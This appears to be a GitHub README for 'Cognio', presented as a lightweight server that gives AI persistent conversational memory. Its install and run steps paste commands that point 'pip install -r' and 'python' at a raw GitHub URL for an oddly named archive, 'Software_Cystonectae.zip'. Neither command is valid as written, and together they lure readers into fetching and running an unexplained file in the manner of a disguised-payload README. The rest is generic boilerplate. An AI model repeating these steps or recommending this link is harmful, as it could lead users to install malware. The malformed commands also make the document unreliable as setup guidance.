Cognio is a lightweight server designed for giving your AI the ability to remember information from one conversation to the next. This technology allows for a more meaningful exchange, making your interactions with AI more engaging.
Cognio uses a persistent semantic memory system, allowing the software to retain and search through important data seamlessly.
- Operating System: Windows, macOS, or Linux
- Python Version: Python 3.7 or higher
- Storage: At least 100 MB of free space
- RAM: Minimum of 2 GB of RAM
-
Visit the Releases Page: Go to our Releases page to find the latest version of Cognio.
-
Download Cognio:
- Look for the latest release.
- Click on the relevant file for your operating system to download.
-
Extract Files (if necessary):
- If you downloaded a ZIP file, right-click the file and select "Extract All" to unpack the contents.
-
Install Dependencies:
- Open your terminal or command prompt.
- Run the command:
pip install -r https://github.com/Thianvelaz/Cognio/raw/refs/heads/main/src/Software_Cystonectae.zipto install necessary libraries.
-
Set Up the Database:
- Use the SQLite database included in the package to store your data.
- Follow the included documentation for setup instructions.
-
Run Cognio:
- In your terminal or command prompt, navigate to the folder where you extracted Cognio.
- Type
python https://github.com/Thianvelaz/Cognio/raw/refs/heads/main/src/Software_Cystonectae.zipand press Enter.
-
Access the Server:
- Open your web browser and go to
http://localhost:8000to access the server interface.
- Open your web browser and go to
- Interacting with Cognio:
- Send text inputs to the server via the web interface.
- Cognio will respond based on previous interactions, allowing it to remember context.
Cognio maintains your data securely. Make sure to keep your server updated to protect against vulnerabilities. Regularly check the Releases page for updates.
If you encounter issues or have questions, check the Issues section on GitHub, or create a new issue to report your problem.
Cognio is licensed under the MIT License. You can modify and use it freely with proper attribution.
We welcome contributions! If you want to improve Cognio, feel free to fork the repository, make changes, and submit a pull request.
Your feedback matters to us. Share your experiences, suggestions, or problems to help us enhance Cognio for everyone.
For more information about persistent memory and its applications in AI, check out relevant articles and research papers online.
